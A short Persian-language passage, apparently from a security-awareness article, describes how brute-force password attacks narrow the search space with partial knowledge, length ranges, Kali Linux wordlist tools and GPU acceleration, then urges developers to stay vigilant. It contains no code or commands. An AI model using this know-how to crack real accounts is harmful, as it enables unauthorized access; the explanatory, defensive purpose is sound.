هکرها چگونه کار می کنند؟ در بیشتر موارد، آنها مشکوک هستند یا از قبل بخشی از رمز عبور را می دانند. کاملاً منطقی است که فرض کنیم رمز عبور کاربر مطمئناً شامل 3 یا 5 کاراکتر نخواهد بود. چنین پسوردهایی منجر به هک های مکرر می شوند. اصولاً هکرها محدوده ای بین 5 تا 10 کاراکتر را انتخاب می کنند و چند کاراکتر را که احتمالاً از قبل می دانند به آن اضافه می کنند. در مرحله بعد، رمزهای عبور با محدوده مورد نظر ایجاد کنید. توزیع لینوکس کالی حتی برنامه هایی برای چنین مواردی دارد. و voila، حمله دیگر طولانی نخواهد بود، زیرا حجم فرهنگ لغت دیگر زیاد نیست. علاوه بر این، یک هکر می تواند از قدرت کارت گرافیک استفاده کند. برخی از آنها از سیستم CUDA پشتیبانی می کنند، در حالی که سرعت شمارش تا 10 برابر افزایش می یابد. و اکنون می بینیم که حمله به این روش ساده کاملا واقعی است. اما نه تنها سایت ها در معرض زور وحشیانه قرار می گیرند.

توسعه دهندگان عزیز هرگز سیستم امنیت اطلاعات را فراموش نکنید، زیرا امروزه بسیاری از مردم از جمله ایالت ها از این نوع حملات رنج می برند. به هر حال، بزرگترین آسیب پذیری شخصی است که همیشه می تواند در جایی حواسش پرت شود یا جایی را نادیده بگیرد. ما برنامه نویس هستیم، اما ماشین های برنامه ریزی شده نیستیم. همیشه هوشیار باشید، زیرا از دست دادن اطلاعات عواقب جدی را تهدید می کند!